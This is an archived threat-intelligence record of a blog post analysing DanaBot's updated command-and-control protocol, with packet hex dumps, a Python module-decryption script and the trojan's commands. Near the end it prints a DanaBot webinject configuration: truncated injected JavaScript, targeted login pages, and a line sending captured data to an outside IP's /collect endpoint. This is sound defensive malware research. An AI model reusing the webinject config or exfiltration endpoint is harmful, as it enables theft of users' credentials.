{
	"id": "8a81a144-072e-4ebc-bd14-839343532395",
	"created_at": "2026-04-06T01:29:29.326499Z",
	"updated_at": "2026-04-10T03:21:33.122409Z",
	"deleted_at": null,
	"sha1_hash": "3c80b2f65cf422fa399a768d9e5e5a38dba5f19b",
	"title": "DanaBot Communications Update",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 60815,
	"plain_text": "DanaBot Communications Update\r\nArchived: 2026-04-06 00:15:34 UTC\r\nSince the last blog post from Proofpoint about the version 4 of DanaBot, the new samples available in Threat Intel\r\nrepository integrate minor changes in their architecture and communications. This short blog post is about the\r\ndifferences spot between those different versions. As a reminder, you can find details on the four major versions\r\nhere:\r\nUnlike the previous versions, the latest samples found in public repositories included a component that first\r\ndownloaded and loaded the main module along with configurations and plugins. That's why two TCP stream\r\nappear instead of one in the version 4:\r\nThe first TCP connection comes from the Downloader, who downloads the main module (about 14 Mb of\r\nencrypted and compressed data) and the second one from the main module itself (similar to version 4).\r\nThe requests sent above respect the DanaBot communication protocol described by ESET. The first packet is used\r\nto transmit the new RSA public key generated on the host, and the second one is a packet with a very specific\r\nstructure used to send instructions and data to the C2.\r\nLike version 4, the packet structure is binary format and has a plaintext header (0x1C-bytes long). The packet data\r\nstructure size is lower than version 4 with 455 bytes and some hashes embedded in the structure are formatted\r\ndifferently. Indeed, before all hashes were formatted using the Delphi TMemoryStream classes and now only the\r\n\"random hash\" has kept this format. 
You can find below the packet structure used by the Downloader to download the main module:\r\nYou can find below an example of a request generated and sent by the Downloader to download the main module:\r\n00000000: [c7 01 00 00][12 66 00 00 00 00 00 00][d9 67 00 00 .....f.......g..\r\n00000010: 00 00 00 00][04 00 00 00][d0 0f 00 00][00 00 00 00] ................\r\n00000020: [00 00 00 00][00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000050: 00 00 00 00 00 00 00 00 00 00 00 00][20][36 41 44 ............ 6AD\r\n00000060: 39 46 45 34 46 39 45 34 39 31 45 37 38 35 36 36 9FE4F9E491E78566\r\n00000070: 35 45 30 44 31 34 34 46 36 31 44 41 42][20][36 41 5E0D144F61DAB 6A\r\n00000080: 44 39 46 45 34 46 39 45 34 39 31 45 37 38 35 36 D9FE4F9E491E7856\r\n00000090: 36 35 45 30 44 31 34 34 46 36 31 44 41 42][20][35 65E0D144F61DAB 5\r\n000000a0: 34 37 34 41 39 35 46 34 39 37 36 42 43 31 38 33 474A95F4976BC183\r\n000000b0: 37 33 31 31 45 39 44 33 42 32 36 46 39 36 45][20 7311E9D3B26F96E\r\n000000c0: 00 00 00][ef 16 f0 dd][46 37 39 30 45 45 34 45 37 .......F790EE4E7\r\n000000d0: 38 46 32 43 38 34 34 37 41 38 38 30 43 46 31 43 8F2C8447A880CF1C\r\n000000e0: 43 44 42 32 46 46 32 00][00 00 00 00 00 00 00 00 CDB2FF2.........\r\n000000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001c0: 00 00 00 00 00 00 00] .......\r\nEach chunk of data received from the C2 is encrypted using AES, and the AES key located in the last 80 bytes is itself encrypted using RSA. The RSA key needed is the private key generated by the Downloader.\r\nThe main module is protected by a second layer of encryption on top of the DanaBot communication layer. Indeed, the module is encrypted using the same technique, but the RSA key needed is the one embedded in the Downloader.\r\nThe AES decryption uses CBC mode with a null IV and operates by blocks of 0x10010 bytes. 
It can be summarized with the following script:\r\nfrom Crypto.Cipher import AES\r\nfrom Crypto.Util.Padding import unpad\r\nfrom wincrypto import CryptImportKey, CryptDecrypt\r\nimport pwn\r\nimport sys\r\n\r\n# Usage: script.py RSA_KEY_BLOB ENCRYPTED_MODULE\r\nif len(sys.argv) == 3:\r\n    hardcoded_key = open(sys.argv[1], 'rb').read()\r\n    enc_data = open(sys.argv[2], 'rb').read()\r\nelse:\r\n    sys.exit(1)\r\n\r\ndef aes_decrypt(key, data):\r\n    # AES-CBC with a null IV; the PKCS#7 padding is removed afterwards\r\n    cipher = AES.new(key, AES.MODE_CBC, iv=b\"\\x00\" * 16)\r\n    plaintext = unpad(cipher.decrypt(data), AES.block_size)\r\n    return plaintext\r\n\r\n# Import the RSA key blob embedded in the Downloader (CryptoAPI format) and use it\r\n# to decrypt the AES key stored in the last 0x80 bytes of the received data\r\nrsa_pub_key = CryptImportKey(hardcoded_key)\r\nencrypted_aes_key = CryptDecrypt(rsa_pub_key, enc_data[-0x80:])\r\nprint(\"AES key : %s\" % encrypted_aes_key[-0x20:].hex())\r\n\r\nenc_data = enc_data[0x0:-0x80]\r\n# The dword just before the RSA blob gives the extra AES block size appended to each chunk\r\naes_bloc_size = pwn.u32(enc_data[-0x4:])\r\nenc_data = enc_data[0x0:-0x4]\r\nlen_enc_data = len(enc_data)\r\noffset = 0\r\nfinal = b''\r\n# Decrypt chunk by chunk: each full chunk is 0x100000 bytes plus the padding block\r\nwhile len_enc_data \u003e 0:\r\n    if len_enc_data \u003c= 0x100000:\r\n        pdwDataLen = len_enc_data\r\n    else:\r\n        pdwDataLen = 0x100000 + aes_bloc_size\r\n    dec = aes_decrypt(encrypted_aes_key[-0x20:], enc_data[offset:offset + pdwDataLen])\r\n    final = final + dec\r\n    len_enc_data = len_enc_data - pdwDataLen\r\n    offset = offset + pdwDataLen\r\nwith open(\"./aes_decrypt_file.bin\", \"wb\") as f:\r\n    f.write(final)\r\nOnce decrypted, the first four bytes are the compressed buffer size, followed by the Zlib magic header and data:\r\n00000000:[35 29 d1 00][78 9c][bc bd 0b 7c 53 55 b6 30 7e 92 5)..x....|SU.0~.\r\n00000010: 9c 36 69 1b 9a 14 82 14 44 2c 1a 15 04 91 5a 54 .6i.....D,....ZT\r\n00000020: .. ..]\r\nThe uncompressed data is a DLL (the main module) similar to the unpacked main module in version 4, although it seems bigger, with a size around 18M. 
Further communications from the main module are similar to version 4 as described in the Proofpoint blog post, except that the data structure is the one discussed previously:\r\nDanaBot commands and sub-commands are used to indicate to the recipient how to handle data. In the version analyzed, all the main commands (with id 2048) and sub-commands described by Proofpoint are still present, except for sub-command 10, since the Tor module is already included.\r\nThis sub-command is used for online functionalities, which is why the C2 reply may be empty. By analyzing these parts, two added \"online\" functionalities were identified. The first one may still be under development: apart from the string \"InstallRDP\" found in the function, not much is done.\r\nThe second one is very similar to the stealer plugin (started in a thread at the beginning of the process), and the following information is gathered on the victim host:\r\nThis sub-command is mainly used to activate/deactivate plugins and set options. First, the main module asks the C2 for the list of available \"CommandRecords\" by sending sub-command 2. 
A list of hashes is received:\r\n00000000: 3336 3931 4335 4244 3239 4239 4432 3333 3691C5BD29B9D233\r\n00000010: 3933 3946 4345 4538 4438 3444 3246 3845 939FCEE8D84D2F8E\r\n00000020: 0d0a 3342 3446 4438 4234 4530 4644 3130 ..3B4FD8B4E0FD10\r\n00000030: 4143 4537 4443 3537 3741 3137 3033 3635 ACE7DC577A170365\r\n00000040: 4232 0d0a 3446 3036 3833 3742 4339 3530 B2..4F06837BC950\r\n00000050: 3237 3839 4242 4638 4639 3834 4639 3730 2789BBF8F984F970\r\n00000060: 3841 3537 0d0a 3632 3236 4334 3531 4645 8A57..6226C451FE\r\n00000070: 4333 3144 4346 4143 4332 3830 3437 4338 C31DCFACC28047C8\r\n00000080: 4238 4237 4338 0d0a 3533 3530 3136 4146 B8B7C8..535016AF\r\n00000090: 4345 3845 4432 4231 3430 3436 4338 4644 CE8ED2B14046C8FD\r\n000000a0: 4534 4635 4244 4233 0d0a E4F5BDB3..\r\nThen, for each of those hashes, sub-command 3 is sent with the \"CommandRecords\" hash as parameter. In the data received, there is a command field that indicates to the main module how to handle the payload located at the end of the packet:\r\n00000000: [20][33 36 39 31 43 35 42 44 32 39 42 39 44 32 33 3691C5BD29B9D23\r\n00000010: 33 39 33 39 46 43 45 45 38 44 38 34 44 32 46 38 3939FCEE8D84D2F8\r\n00000020: 45][04 00 00 00][0c 00 00 00][00 00 00 00 00 00 00 E...............\r\n...\r\n000006b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00][0a 00 ................\r\n000006c0: 00 00] 00 00 00 00 [33 36 30 7c 31 7c 7c 7c 0d 0a] ......360|1|||..\r\nIn the above example, the command number is 12, so the payload can be forwarded to the right function:\r\nSince version 4, new functions were added to parse the Webinject and Webfilter configuration (Zeus style) received.\r\nset_local_variables ybhftdhnb65\r\nset_url https://code.jquery.com/jquery*.js* https://apis.google.com/js/client.js* https://clients5.google.com/ad\r\ndata_before\r\n*\r\ndata_end\r\ndata_inject\r\n(function(){var s_d_i={t:1000*60*60*24*7,b:'%bot_id%',v:'%bot_version%',n:'%timenow%',s:'%local_variables=_stat_\r\ndata_end\r\ndata_after\r\ndata_end\r\n*|1|2||\r\n*.youtube.com*|0|1||\r\n*.discordapp.com*|0|1||\r\n*.facebook.com*|0|1||\r\n*myhentaigallery.com*|0|1||\r\n*chat.google.com*|0|1||\r\n*.messenger.com/ajax/*|0|1||\r\n*.bing.com/rewardsapp/*|0|1||\r\n*api.us-east-1.aiv-delivery.net*|0|1||\r\n*agafurretor.com/event*|0|1||\r\n*openclassrooms.workplace.com/api/*|0|1||\r\n*signaler-pa.clients6.google.com*|0|1||\r\n*drive.google.com/drive*|0|1||\r\n*.facebook.com/ads/*|1|1||\r\n*.messenger.com/login/password*|1|1||\r\n*business.facebook.com*|1|1||\r\n*.facebook.com/login.php*|1|1||\r\n*.facebook.com/ajax/register.*|1|1||\r\n*.facebook.com/ajax/bulk-route-definitions/*|0|1||\r\n*.facebook.com/ajax/relay-ef/*|0|1||\r\n*.facebook.com/ajax/webstorage/process_keys/*|0|1||\r\n*.facebook.com/ajax/navigation/*|0|1||\r\n*youtube-nocookie.com/youtubei/v1/log_event*|0|1||\r\n*facebook.com/ajax/timezone/update.php*|0|1||\r\n*facebook.com/ajax/route-definition*|0|1||\r\n*metrfaiuerqoiu*|https://88.150.227.98/collect|||\r\nIn a few weeks, the hardcoded version embedded in each sample has increased 2 or 3 times, meaning that the DanaBot Trojan is still under active development. We expect to see other new features in the near future, and maybe another blog post with more details.\r\nSource: https://blog.lexfo.fr/danabot-malware.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.lexfo.fr/danabot-malware.html"
	],
	"report_names": [
		"danabot-malware.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775438969,
	"ts_updated_at": 1775791293,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3c80b2f65cf422fa399a768d9e5e5a38dba5f19b.pdf",
		"text": "https://archive.orkl.eu/3c80b2f65cf422fa399a768d9e5e5a38dba5f19b.txt",
		"img": "https://archive.orkl.eu/3c80b2f65cf422fa399a768d9e5e5a38dba5f19b.jpg"
	}
}